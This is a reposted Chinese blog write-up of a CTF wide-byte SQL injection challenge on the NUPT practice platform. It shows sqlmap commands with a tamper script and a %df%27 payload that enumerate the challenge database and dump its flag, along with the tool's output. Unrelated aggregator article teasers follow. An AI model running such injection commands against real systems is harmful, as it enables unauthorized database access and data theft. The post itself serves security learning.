于南邮平台游荡关于宽字节注入—

于南邮平台游荡关于宽字节注入——骚操作

2018-08-10 685

今天早上在南邮平台游荡的时候，做了一题关于宽字节注入的题目，虽然宽字节注入属于很常见的题目

但是，大多数人使用的都是手工注入，我作为一个小萌新(手工注入太难了QAQ）

今天get到一个新的骚操作：

题目分析：

、

首先：进行简单的手工注入操作：

可以看出这个属于典型的宽字节注入：关于宽字节注入的知识点，我刚刚转载一篇文章，内容比较详细：欢迎阅读哦！！！

转宽字节注入简介：https://www.cnblogs.com/lxz-1263030049/p/9459236.html

我使用的sqlmap注入，我们首先需要知道在sqlmap中有内置的py脚本

今天我们需要使用的内置脚本就是：关于宽字节的

apostrophemask.py UTF-8编码
Example:
* Input: AND '1'='1'
* Output: AND %EF%BC%871%EF%BC%87=%EF%BC%871%EF%BC%87

首先：我们爆一下库：python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes --dbs

查询到有两个数据库，我们知道划线的有用呀

我们对这个数据库进行爆表：python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes -D sae-chinalover --table

得到三个表，我是一个接着一个进行爆表的最后得到是ctf4中有flag

我在这里直接写出第四个表中进行flag的获取：python sqlmap.py -u http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3 --tamper unmagicquotes -D sae-chinalover -T ctf4 -C flag --dump

还有一种方法，今天我在网上刚刚看见的先膜拜一下，因为我竟然没有复现成功呀(ORZ）

我会把他的过程写出来的

--threads 10 //如果你玩过 msfconsole的话会对这个很熟悉 sqlmap线程最高设置为10
--level 3 //sqlmap默认测试所有的GET和POST参数，当--level的值大于等于2的时候也会测试HTTP Cookie头的值，当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高可到5
--risk 3 // 执行测试的风险（0-3，默认为1）risk越高，越慢但是越安全
--search //后面跟参数 -D -T -C 搜索列（S），表（S）和或数据库名称（S） 如果你脑子够聪明，应该知道库列表名中可能会有ctf,flag等字样，结果有时候题目就是这么耿直
接下来他就直接进行注入操作：

sqlmap -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1%df%27" --search -C flag
--level 3 --risk 1 --thread 10
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2#pip}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

最后得到答案：

Database: sae-chinalover
Table: ctf4
[1 entry] +-----------------+ | flag | +-----------------+ | nctf{gbk_3sqli} | +-----------------+ [05:36:36] [INFO] table '`sae-chinalover`.ctf4' dumped to CSV file 'C:\Users\ninthDVEIL HUNSTER\.sqlmap\output\chinalover.sinaapp.com\dump\sae-chinalover\ctf4.csv' [05:36:36] [INFO] fetched data logged to text files under 'C:\Users\ninthDVEIL HUNSTER\.sqlmap\output\chinalover.sinaapp.com' [*] shutting down at 05:36:36

过程是很容易理解只是，为什么不可以复现呢，这个是我的疑问(Orz)
如果有人能够解答，可以在下方的评论区留言哦！！！！
博主先谢谢你们了！！！！！

参考资料：

SQLmap注入学习实战 —— 宽字节注入与sqlmap进阶玩法：https://blog.csdn.net/qq_40476955/article/details/79019154
sqlmap高级篇之绕过waf（宽字节注入）：https://baijiahao.baidu.com/s?id=1590473215456997704&wfr=spider&for=p

您可以考虑给博主来个小小的打赏以资鼓励，您的肯定将是我最大的动力。

作者：落花四月

出处： https://www.cnblogs.com/lxz-1263030049/

关于作者：潜心于网络安全学习。如有问题或建议，请多多赐教！

特此声明：所有评论和私信都会在第一时间回复。也欢迎园子的大大们指正错误，共同进步。或者直接私信我

声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是作者坚持原创和持续写作的最大动力！

微信关注我们

原文链接：https://yq.aliyun.com/articles/649041

转载内容版权归作者及来源网站所有！

低调大师中文资讯倾力打造互联网数据资讯、行业资源、电子商务、移动互联网、网络营销平台。持续更新报道IT业界、互联网、市场资讯、驱动更新,是最及时权威的产业资讯及硬件资讯报道平台。

为什么越来越多的开发者选择使用Spring Boot

Web应用开发背景使用Java做Web应用开发已经有近20年的历史了，从最初的Servlet1.0一步步演化到现在如此多的框架，库以及整个生态系统。经过这么长时间的发展，Java作为一个成熟的语言，也演化出了非常成熟的生态系统，这也是许多公司采用Java作为主流的语言进行服务器端开发的原因，也是为什么Java一直保持着非常活跃的用户群。最受Java开发者喜好的框架当属Spring，Spring也成为了在Java EE开发中真正意义上的标准，但是随着新技术的发展，脚本语言大行其道的时代（Node JS，Ruby，Groovy，Scala等），Java EE使用Spring逐渐变得笨重起来，大量的XML文件存在与项目中，繁琐的配置，整合第三方框架的配置问题，低下的开发效率和部署效率等等问题。这些问题在不断的社区反馈下，Spring团队也开发出了相应的框架：Spring Boot。Spring Boot可以说是至少近5年来Spring乃至整个Java社区最有影响力的项目之一，也被人看作是：Java EE开发的颠覆者（但是不是有点too young，too simple的感觉！）。 Sp...

2018-08-11

578

1 Dubbo简介 Dubbo是一款高性能、轻量级的开源Java RPC框架，它提供了三大核心能力：面向接口的远程方法调用，智能容错和负载均衡，以及服务自动注册和发现。作为一个轻量级RPC框架，Dubbo的设计架构简洁清晰，主要组件包括Provider（服务提供者）,Consumer（服务消费者）,Registry（注册中心）三部分组成。此外还有用于服务监控的Monitor,它们之间的关系如下所示：在一个分布式系统中，为了做到系统的高可用，即服务宕机时不影响对外正常提供服务，需要组建负载集群，当集群中某一节点没有及时返回数据时，需要有集群容错（重试）机制。 2 Dubbo负载均衡在集群负载均衡时，Dubbo 提供了以下5种均衡策略，缺省为 random 随机调用。 Random 随机调用 Random LoadBalance 随机，按权重设置随机概率。在一个截面上碰撞的概率高，但调用量越大分布越均匀，而且按概率使用权重后也比较均匀，有利于动态调整提供者权重。 RoundRobin LoadBalance 轮循，按公约后的权重设置轮循比率。存在慢的提供者累积请求的问题，比如：...

2018-08-11

609

资源下载

更多资源

优质分享App

近一个月的开发和优化，本站点的第一个app全新上线。该app采用极致压缩，本体才4.36MB。系统里面做了大量数据访问、缓存优化。方便用户在手机上查看文章。后续会推出HarmonyOS的适配版本。

腾讯云软件源

为解决软件依赖安装时官方源访问速度慢的问题，腾讯云为一些软件搭建了缓存服务。您可以通过使用腾讯云软件源站来提升依赖包的安装速度。为了方便用户自由搭建服务架构，目前腾讯云软件源站支持公网访问和内网访问。

Spring

Spring框架（Spring Framework）是由Rod Johnson于2002年提出的开源Java企业级应用框架，旨在通过使用JavaBean替代传统EJB实现方式降低企业级编程开发的复杂性。该框架基于简单性、可测试性和松耦合性设计理念，提供核心容器、应用上下文、数据访问集成等模块，支持整合Hibernate、Struts等第三方框架，其适用范围不仅限于服务器端开发，绝大多数Java应用均可从中受益。

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能，例如代码缩略图，Python的插件，代码段等。还可自定义键绑定，菜单和工具栏。Sublime Text 的主要功能包括：拼写检查，书签，完整的 Python API ， Goto 功能，即时项目切换，多选择，多窗口等等。Sublime Text 是一个跨平台的编辑器，同时支持Windows、Linux、Mac OS X等操作系统。